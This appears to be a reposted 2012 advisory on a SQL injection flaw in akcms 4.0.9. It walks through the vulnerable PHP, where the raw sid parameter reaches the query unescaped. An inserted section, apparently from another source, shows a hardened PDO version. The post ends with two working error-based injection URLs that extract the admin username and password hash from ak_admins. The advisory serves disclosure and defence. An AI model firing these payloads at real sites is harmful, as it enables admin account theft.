akcms 4.0.9 SQL injection exp - vulnerability warning - the black bar safety net

2012-05-01T00:00:00
ID MYHACK58:62201233765
Type myhack58
Reporter 佚名 (anonymous)
Modified 2012-05-01T00:00:00

Description

I stumbled on this by chance; I don't know whether anyone has posted it already.

The vulnerability is in akcms_keyword.php:

<?php
$i = strpos(__FILE__, 'akcms_keyword.php');
$mypath = substr(__FILE__, 0, $i);
include $mypath . 'akcms_config.php';
include $mypath . $system_root . '/fore/keyword.php';
?>

$system_root is the name of the backend (admin) directory, set in akcms_config.php:

<?php
$system_root = 'admin';
$foreload = 1;
?>

Now look at admin/fore/keyword.php:

<?php
if (!isset($_GET['sid']) || !isset($_GET['keyword'])) exit();
require_once $mypath . $system_root . '/include/common.inc.php';
require_once AK_ROOT . 'include/forecache.func.php';
$forecache = getforecache($currenturl);
require_once(AK_ROOT . 'include/global.func.php');
require_once(AK_ROOT . 'include/fore.inc.php');
$sid = $_GET['sid'];            // taken straight from the request, never escaped
$keyword = $_GET['keyword'];
$se = getsedata($sid);
// $keyword goes through addslashes(), but $sid is interpolated raw into the WHERE clause
$k = $db->get_by('*', 'keywords', "sid='$sid' AND keyword='" . addslashes($keyword) . "'");
if (!isset($template)) $template = $se['template'];
$variables = array();
$variables['template'] = $template;
$variables['html'] = 0;
$variables['sid'] = $sid;
$variables['num'] = $k['num'];
$variables['keyword'] = $keyword;
$variables['keyword_url'] = urlencode($keyword);
$variables['keyword_html'] = htmlspecialchars($keyword);
$html = render_template($variables);
if ($forecache === false) setforecache($currenturl, $html);
if (substr($html, 0, 5) == '<?xml') header('Content-Type:text/xml;charset=' . $header_charset);
echo $html;
require_once(AK_ROOT . 'include/exit.php');
?>

The maintainers really did a number here: $keyword gets a magic escape, while sid='$sid' is not escaped at all. I don't quite get it.

Now look at the $db->get_by function. It is really nothing more than a SELECT:

function get_by($what, $from, $where = '') {
    $table = $this->fulltablename($from);
    $sql = "SELECT {$what} FROM {$table}";
    if ($where != '') $sql .= " WHERE {$where}";
    if (strpos($what, '(') === false) $sql .= " LIMIT 1";
    $row = $this->get_one($sql);
    if ($row === false) {
        return false;
    } elseif (count($row) == 1) {
        return current($row);
    } else {
        return $row;
    }
}

get_by does no filtering of its own either: whatever string it receives in $where is appended to the query verbatim. The unescaped $sid therefore triggers a SQL injection vulnerability.
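The vulnerable lookup pattern from keyword.php next to a hardened form, as an added example that is not akcms code. It assumes a table ak_keywords(sid INTEGER, keyword TEXT, num INTEGER) and a numeric sid; the page shows neither the schema nor the column type.

```php
<?php
// Added example, not code from akcms: the lookup shape shown in the advisory
// beside a version that validates sid and binds both values as parameters.
// Assumption: sid is a numeric id and the table is ak_keywords(sid, keyword, num).

// Vulnerable shape (as in admin/fore/keyword.php): $sid is concatenated raw,
// $keyword only passes through addslashes().
function lookup_keyword_vulnerable($db, $sid, $keyword) {
    return $db->get_by('*', 'keywords',
        "sid='$sid' AND keyword='" . addslashes($keyword) . "'");
}

// Hardened: refuse anything but a plain integer for sid, then use a prepared
// statement so neither value can alter the query structure.
function lookup_keyword_safe(PDO $pdo, $sid, $keyword) {
    if (!ctype_digit((string)$sid)) {
        return false;                       // rejected before any SQL is built
    }
    $stmt = $pdo->prepare(
        'SELECT * FROM ak_keywords WHERE sid = :sid AND keyword = :keyword LIMIT 1');
    $stmt->bindValue(':sid', (int)$sid, PDO::PARAM_INT);
    $stmt->bindValue(':keyword', $keyword, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC);  // false when no row matches
}

// Self-contained demo on an in-memory SQLite database (constructed data).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE ak_keywords (sid INTEGER, keyword TEXT, num INTEGER)');
$pdo->exec("INSERT INTO ak_keywords VALUES (1, 'php', 42)");

var_dump(lookup_keyword_safe($pdo, '1', 'php'));                  // array(sid=1, keyword=php, num=42)
var_dump(lookup_keyword_safe($pdo, "11111' and '1'='1", 'php'));  // false: non-numeric sid refused
var_dump(lookup_keyword_safe($pdo, '1', "php' OR '1'='1"));       // false: bound as a literal string
```

Run it with the PHP CLI (php lookup.php); the sqlite PDO driver ships with standard PHP builds.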


exp:

The administrator account:

http://localhost/akcms4.0.9/akcms_keyword.php?sid=11111'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,editor,0x27,0x7e) from ak_admins limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&keyword=1

The administrator password:

http://localhost/akcms4.0.9/akcms_keyword.php?sid=11111'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,password,0x27,0x7e) from ak_admins limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1&keyword=1

by sword the lone line